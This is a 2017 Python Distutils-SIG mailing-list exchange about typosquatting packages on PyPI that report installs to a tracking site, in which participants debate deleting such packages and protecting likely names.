[Distutils] Malicious packages on PyPI

Matt Joyce matt at nycresistor.com
Thu Jun 1 13:32:19 EDT 2017


that's the package repo on github.

It's basically a test dummy package that reports users who have ran that
package template.

the site referenced lists the package name that the user ran to get posted
to the site.   there appear to be many packages in pypi that are built off
this fatezero template.

it is non destructive... as a test payload.  but the method used is
obviously highly successful as an attack vector.  there may be more
nefarious packages already in pypi.

pypi is not a very good package management solution.  most folks I advise
to build from pypi in CI/CD but push to production via a real package
management solution such as apt or yum.  always double check sources coming
from the internet.


On Thu, Jun 1, 2017 at 1:24 PM, Thomas Kluyver <thomas at kluyver.me.uk> wrote:

> On closer examination, those packages do not actually appear to upload
> any information - they seem to be empty packages placed there to serve
> as a warning.
> It's not clear to me whether the data on the fatezero.org website is
> from other packages which really do upload data, or if it's fake.
> On Thu, Jun 1, 2017, at 06:18 PM, Thomas Kluyver wrote:
> > Are we aware of this?
> > http://evilpackage.fatezero.org/
> >
> > I recall there were a couple of these before which were taken down, but
> > someone appears to have made a cookiecutter template so you can very
> > easily claim names on PyPI, and anyone who installs that package will
> > submit their information to that site. A couple that are up at the
> > moment:
> >
> > https://pypi.python.org/pypi/requirements-txt/1.1.1
> > https://pypi.python.org/pypi/ztz/0.1.1
> >
> > Do we delete them? Do we try to detect similar packages being uploaded
> > and block them? I suspect it's a waste of time to try to prevent this in
> > general, but maybe it's worth protecting likely names that people might
> > 'pip install' by mistake, such as requirements-txt.
> >
> > Thomas
> > _______________________________________________
> > Distutils-SIG maillist  -  Distutils-SIG at python.org
> > https://mail.python.org/mailman/listinfo/distutils-sig
> _______________________________________________
> Distutils-SIG maillist  -  Distutils-SIG at python.org
> https://mail.python.org/mailman/listinfo/distutils-sig
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.python.org/pipermail/distutils-sig/attachments/20170601/821eae63/attachment.html>

More information about the Distutils-SIG mailing list